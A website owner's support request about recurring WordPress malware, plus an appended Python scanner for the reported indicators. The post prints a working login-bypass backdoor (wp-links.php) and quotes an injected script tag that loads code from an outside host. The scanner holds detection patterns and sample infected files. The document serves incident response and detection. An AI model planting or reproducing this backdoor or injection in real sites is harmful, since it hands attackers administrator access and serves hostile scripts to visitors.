Request for Support – WordPress Malware Issue
Dear Wordfence Support Team,
I am reaching out to seek assistance with a malware issue on my WordPress website. I have been experiencing recurring malware injections, and despite my efforts, I have been unable to completely resolve the issue.
Description of the malware issue:
- Malicious files: wp-links.php, sw.js, font.js, index.php, google.json
- File locations:
  - wp-links.php found in the root directory, and occasionally in public_html/wp-includes
  - Additional files in the wp-content folder: index.php and google.json
  - Presence of these malicious files in wp-includes/theme folder and plugin folders as well
- Code injection: The malware injects a script into the theme’s header.php file with the following content: `<script>var pm_tag = 'a4s';var pm_pid = "23751-1824878d";</script><script src="//xm.xms.lol/js/pub.min.js" async></script>`
- Other affected files: There are additional PHP files that I have been unable to locate.
- Malware detection: When Googling the issue, it shows the reason as SMW-INJ-21631-php.tool.obf.remote-0.
Files in the plugin folders affected by malware:
- public_html/wp-content/plugins/google-site-kit/google-site-kit.php
- public_html/wp-content/plugins/pixwell-deal/pixwell-deal.php
- public_html/wp-content/plugins/elementor/elementor.php
- public_html/wp-content/plugins/envato-market/envato-market.php
- public_html/wp-content/plugins/pixwell-core/pixwell-core.php
Code snippet from wp-links.php file:
```php
<?php
// Backdoor: bootstraps WordPress, then logs the requester in as any user id.
if ( ! defined( 'DIZIN' ) ) {
    define( 'DIZIN', dirname( __FILE__ ) . '/' );
}
require_once( DIZIN . "wp-load.php" );

// Triple MD5 of the 'sifre' query parameter is compared to a hard-coded hash.
$pass     = md5( md5( md5( $_GET['sifre'] ) ) );
$password = "74de57650aab7115e3c3c1e0507082f6";
$user_id  = $_GET['userid'];

if ( $pass == $password ) {
    require_once( DIZIN . 'wp-includes/pluggable.php' );
    $user_info = get_userdata( $user_id );
    $username  = $user_info->user_login;
    $user      = get_user_by( 'login', $username );
    if ( ! is_wp_error( $user ) ) {
        // Issues an auth cookie for that user without their password.
        wp_clear_auth_cookie();
        wp_set_current_user( $user->ID );
        wp_set_auth_cookie( $user->ID );
        $redirect_to = user_admin_url();
        wp_safe_redirect( $redirect_to );
        exit();
    }
}
```
Steps I have taken so far:
- Scanned my website using a security plugin, but the malware continues to reappear.
- Removed wp-links.php, sw.js, index.php, google.json, and the affected plugin files manually from the respective directories.
- Checked theme files for suspicious code and removed any identified malicious snippets.
- Updated WordPress, themes, and plugins to their latest versions.
- Changed all passwords related to my website, including admin, FTP, and database.
Despite these efforts, the malware keeps reappearing, and I’m unable to find the source of the infection. I would greatly appreciate your assistance in identifying and resolving the issue permanently.
Please let me know if there are any additional steps I can take or if you require any further information to assist me with this matter. Thank you for your time and support.
Sincerely,
Helani
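An added example, not part of the original post and not Wordfence code: a small Python scanner that walks a site's document root for the indicators quoted in the post (the wp-links.php filename, the injected pm_tag/pm_pid script and its host, the hash constant from the backdoor) plus a heuristic for the auth-cookie pattern seen in the wp-links.php snippet. The rule names, the functions `scan` and `build_sample_tree`, and the sample tree are assumptions of this example.

```python
import re
import tempfile
from pathlib import Path

# Indicators quoted in the post above; the rule names are this example's own.
NAME_IOCS = {"wp-links.php"}
CONTENT_IOCS = {
    "injected-script-host": re.compile(rb"xm\.xms\.lol"),
    "injected-script-vars": re.compile(rb"\bpm_tag\b.*\bpm_pid\b", re.S),
    "backdoor-hash": re.compile(rb"74de57650aab7115e3c3c1e0507082f6"),
    # Heuristic: boots WordPress, then sets an auth cookie from request input.
    "auth-backdoor": re.compile(rb"wp-load\.php.*\$_(GET|POST).*wp_set_auth_cookie", re.S),
}
# Constructed sample site (not real captures): one clean file, two infected.
SAMPLES = {
    "wp-config.php": b"<?php define('DB_NAME', 'wp');",
    "wp-content/themes/demo/header.php":
        b"<script>var pm_tag = 'a4s';var pm_pid = 'x';</script>"
        b"<script src='//xm.xms.lol/js/pub.min.js' async></script>",
    "wp-links.php": b"<?php require 'wp-load.php'; $i = $_GET['userid']; wp_set_auth_cookie($i);",
}


def scan(root, exts=(".php", ".js", ".json", ".html")):
    """Return sorted (relative_path, rule) pairs for every indicator hit."""
    hits = set()
    for path in Path(root).rglob("*"):
        rel = path.relative_to(root).as_posix()
        if path.name in NAME_IOCS:
            hits.add((rel, "known-bad-filename"))
        if path.suffix.lower() not in exts or not path.is_file():
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        hits.update((rel, rule) for rule, rx in CONTENT_IOCS.items() if rx.search(data))
    return sorted(hits)


def build_sample_tree():
    root = Path(tempfile.mkdtemp(prefix="wp-sample-"))
    for rel, body in SAMPLES.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(body)
    return root


if __name__ == "__main__":
    print(*scan(build_sample_tree()), sep="\n")
```

Pointing `scan()` at the site's `public_html` directory and re-running it after each cleanup shows which files are being re-infected.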